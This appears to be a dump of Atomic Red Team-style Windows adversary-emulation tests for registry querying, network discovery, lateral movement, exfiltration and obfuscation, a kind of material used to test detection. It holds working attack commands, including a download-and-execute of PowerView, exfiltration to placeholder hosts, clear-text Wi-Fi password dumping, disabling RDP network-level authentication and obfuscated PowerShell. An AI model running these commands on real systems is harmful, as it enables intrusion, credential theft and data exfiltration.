Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem. Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-ChildItem -Path "HKLM:system\currentcontrolset\services" 
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
T1012 powershell windows Enumerate COM Objects in Registry with Powershell
Query Registry
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file. An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. See: https://www.mandiant.com/resources/hunting-com-objects
New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > $env:temp\clsids.txt
ForEach($CLSID in Get-Content "$env:temp\clsids.txt")
{try{write-output "$($Position)-$($CLSID)"
write-output "------------"| out-file #{output_file} -append
write-output $($CLSID)| out-file #{output_file} -append
$handle=[activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
$handle | get-member -erroraction silentlycontinue | out-file #{output_file} -append
$position += 1} catch{}}
T1012 command_prompt elevated windows Reg query for AlwaysInstallElevated status
Query Registry
The reg query commands allows to check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine thus allowing a regular user to install a Microsoft Windows Installer package with system level privileges. This can be abused by an attacker to escalate privileges in the host to SYSTEM level.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
T1012 command_prompt elevated windows Check Software Inventory Logging (SIL) status via Registry
Query Registry
Microsoft's Software Inventory Logging (SIL) collects information about software installed per host basis. Adversary can use such logs to passively check for existence of software of interest to them. Status of SIL can be checked via registry. [Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
T1012 command_prompt windows Inspect SystemStartOptions Value in Registry
Query Registry
The objective of this test is to query the SystemStartOptions key under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This action could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings. key is.
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
T1016 command_prompt windows System Network Configuration Discovery on Windows
System Network Configuration Discovery
Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config
T1016 command_prompt windows List Windows Firewall Rules
System Network Configuration Discovery
Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
netsh advfirewall firewall show rule name=all
T1016 command_prompt windows System Network Configuration Discovery (TrickBot Style)
System Network Configuration Discovery
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn ipconfig /all, net config workstation, net view /all /domain, nltest /domain_trusts. Output will be via stdout.
ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts
T1016 powershell windows List Open Egress Ports
System Network Configuration Discovery
This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
$ports = Get-content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    $test = new-object system.Net.Sockets.TcpClient
    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
    $totalports++ | Out-Null
    if ($test.Connected) {
        $result = "$port open" 
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -append $file
        $totalopen++ | Out-Null
    }
    else {
        $result = "$port closed" 
        Write-Host -ForegroundColor Red $result
        $totalclosed++ | Out-Null
        $result | Out-File -Encoding ASCII -append $file
    }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results
T1016 command_prompt windows Adfind - Enumerate Active Directory Subnet Objects
System Network Configuration Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}
T1016 command_prompt windows Qakbot Recon
System Network Configuration Discovery
A list of commands known to be performed by Qakbot for recon purposes
"#{recon_commands}"
T1016 command_prompt windows DNS Server Discovery Using nslookup
System Network Configuration Discovery
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%
T1016.001 command_prompt windows Check internet connection using ping Windows
Internet Connection Discovery
Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -n 4 #{ping_target}
T1016.001 powershell windows Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
Internet Connection Discovery
Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS).
Test-NetConnection -ComputerName #{target}
T1016.001 powershell windows Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
Internet Connection Discovery
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com.
Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target}
T1016.001 powershell windows Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
Internet Connection Discovery
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8.
Test-NetConnection -CommonTCPPort SMB -ComputerName #{target}
T1016.002 command_prompt windows Enumerate Stored Wi-Fi Profiles And Passwords via netsh
Wi-Fi Discovery
Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
netsh wlan show profile * key=clear
T1018 command_prompt windows Remote System Discovery - net
Remote System Discovery
Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled.
net view /domain
net view
T1018 command_prompt windows Remote System Discovery - net group Domain Computers
Remote System Discovery
Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
net group "Domain Computers" /domain
T1018 command_prompt windows Remote System Discovery - nltest
Remote System Discovery
Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
nltest.exe /dclist:#{target_domain}
T1018 command_prompt windows Remote System Discovery - ping sweep
Remote System Discovery
Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
T1018 command_prompt windows Remote System Discovery - arp
Remote System Discovery
Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
arp -a
T1018 powershell elevated windows Remote System Discovery - nslookup
Remote System Discovery
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
T1018 command_prompt elevated windows Remote System Discovery - adidnsdump
Remote System Discovery
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal.
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
T1018 command_prompt windows Adfind - Enumerate Active Directory Computer Objects
Remote System Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
T1018 command_prompt windows Adfind - Enumerate Active Directory Domain Controller Objects
Remote System Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
T1018 powershell windows Enumerate domain computers within Active Directory using DirectorySearcher
Remote System Discovery
This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}
T1018 powershell windows Enumerate Active Directory Computers with Get-AdComputer
Remote System Discovery
The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory. Upon successful execution a listing of Computers will output with their paths in AD. Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
Get-AdComputer -Filter *
T1018 powershell windows Enumerate Active Directory Computers with ADSISearcher
Remote System Discovery
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. Upon successful execution a listing of computers will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
T1018 powershell windows Get-DomainController with PowerView
Remote System Discovery
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
T1018 powershell windows Get-WmiObject to Enumerate Domain Controllers
Remote System Discovery
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers. Upon successful execution a listing of Systems from AD will output with their paths. Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }
T1018 command_prompt windows Remote System Discovery - net group Domain Controller
Remote System Discovery
Identify remote systems with net.exe querying the Active Directory Domain Controller. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.
net group /domain "Domain controllers"
T1018 powershell windows Enumerate Remote Hosts with Netscan
Remote System Discovery
This test uses Netscan to identify remote hosts in a specified network range.
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
T1020 powershell windows IcedID Botnet HTTP PUT
Automated Exfiltration
Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
T1020 powershell windows Exfiltration via Encrypted FTP
Automated Exfiltration
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
T1021.001 powershell windows RDP to DomainController
Remote Desktop Protocol
Attempt an RDP session via Remote Desktop Application to a DomainController.
$Server=#{logonserver}
$User = Join-Path #{domain} #{username}
$Password="#{password}"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"
T1021.001 powershell elevated windows Changing RDP Port to Non Standard Port via Powershell
Remote Desktop Protocol
Changing RDP Port to Non Standard Port via Powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}
T1021.001 command_prompt elevated windows Changing RDP Port to Non Standard Port via Command_Prompt
Remote Desktop Protocol
Changing RDP Port to Non Standard Port via Command_Prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
T1021.001 command_prompt windows Disable NLA for RDP via Command Prompt
Remote Desktop Protocol
Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/ See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
T1021.002 command_prompt windows Map admin share
SMB/Windows Admin Shares
Connecting To Remote Shares
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
T1021.002 powershell windows Map Admin Share PowerShell
SMB/Windows Admin Shares
Map Admin share utilizing PowerShell
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
T1021.002 command_prompt elevated windows Copy and Execute File with PsExec
SMB/Windows Admin Shares
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
T1021.002 command_prompt elevated windows Execute command writing output to local Admin Share
SMB/Windows Admin Shares
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
T1021.003 powershell windows PowerShell Lateral Movement using MMC20
Distributed Component Object Model
Powershell lateral movement using the mmc20 application com object. Reference: https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ Upon successful execution, cmd will spawn calc.exe on a remote computer.
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
T1021.003 powershell windows PowerShell Lateral Movement Using Excel Application Object
Distributed Component Object Model
Powershell lateral movement using the Excel COM objects. Reference: https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 Upon successful execution, cmd will spawn calc.exe on a remote computer.
copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"))
$com.ActivateMicrosoftApp("5")
T1021.004 powershell elevated windows ESXi - Enable SSH via PowerCLI
SSH
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 command_prompt windows ESXi - Enable SSH via VIM-CMD
SSH
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1021.006 powershell elevated windows Enable Windows Remote Management
Windows Remote Management
Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
Enable-PSRemoting -Force
T1021.006 powershell windows Remote Code Execution with PS Credentials Using Invoke-Command
Windows Remote Management
Simulate lateral movement with PowerShell Remoting on the local host. Upon successful execution, PowerShell will execute whoami using Invoke-Command, targeting the local machine as remote target.
Enable-PSRemoting -Force
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
T1021.006 powershell elevated windows WinRM Access with Evil-WinRM
Windows Remote Management
An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
T1025 command_prompt windows Identify Documents on USB and Removable Media via PowerShell
Data from Removable Media
This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files (e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics how adversaries might scan for sensitive documents on removable devices for exfiltration or analysis.
powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"
T1027 powershell windows Execute base64-encoded PowerShell
Obfuscated Files or Information
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
T1027 powershell windows Execute base64-encoded PowerShell from Windows Registry
Obfuscated Files or Information
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry.
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
T1027 command_prompt windows Execution from Compressed File
Obfuscated Files or Information
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
T1027 powershell windows DLP Evasion via Sensitive Data in VBA Macro over email
Obfuscated Files or Information
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}
T1027 powershell windows DLP Evasion via Sensitive Data in VBA Macro over HTTP
Obfuscated Files or Information
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"
T1027 powershell windows Obfuscated Command in PowerShell
Obfuscated Files or Information
This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
T1027 manual windows Obfuscated Command Line using special Unicode characters
Obfuscated Files or Information
This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters). Reference: https://wietze.github.io/blog/windows-command-line-obfuscation
T1027 powershell elevated windows Snake Malware Encrypted crmlog file
Obfuscated Files or Information
The following Atomic Test will create a file with a specific name and sets its attributes to Hidden, System, and Archive. This was related to the Snake Malware campaign and is later decrypted by Snake's kernel driver. [Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"
T1027 command_prompt windows Execution from Compressed JScript File
Obfuscated Files or Information
Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
T1027 powershell windows Obfuscated PowerShell Command via Character Array
Obfuscated Files or Information
Spawns a child PowerShell process using character array obfuscation. Both the PowerShell binary name and executed command are constructed from ASCII values at runtime to evade string-based detection.
$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)
T1027.004 command_prompt windows Compile After Delivery using csc.exe
Compile After Delivery
Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} "#{input_file}"
T1027.004 powershell windows Dynamic C# Compile
Compile After Delivery
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
Invoke-Expression "#{input_file}"
T1027.006 powershell windows HTML Smuggling Remote Payload
HTML Smuggling
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction. The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
& "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html"
T1027.007 powershell elevated windows Dynamic API Resolution-Ninja-syscall
Dynamic API Resolution
This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper.
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
if (Test-Path "C:\Users\Default\AppData\Local\Temp\hello.log") { Remove-Item "C:\Users\Default\AppData\Local\Temp\hello.log" -Force; Write-Host "[+] hello.log removed." }
T1027.013 powershell windows, macos, linux Decode Eicar File and Write to File
Encrypted/Encoded File
Decode the eicar value, and write it to file, for AV/EDR to try to catch.
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
T1027.013 powershell windows, macos, linux Decrypt Eicar File and Write to File
Encrypted/Encoded File
Decrypt the eicar value, and write it to file, for AV/EDR to try to catch.
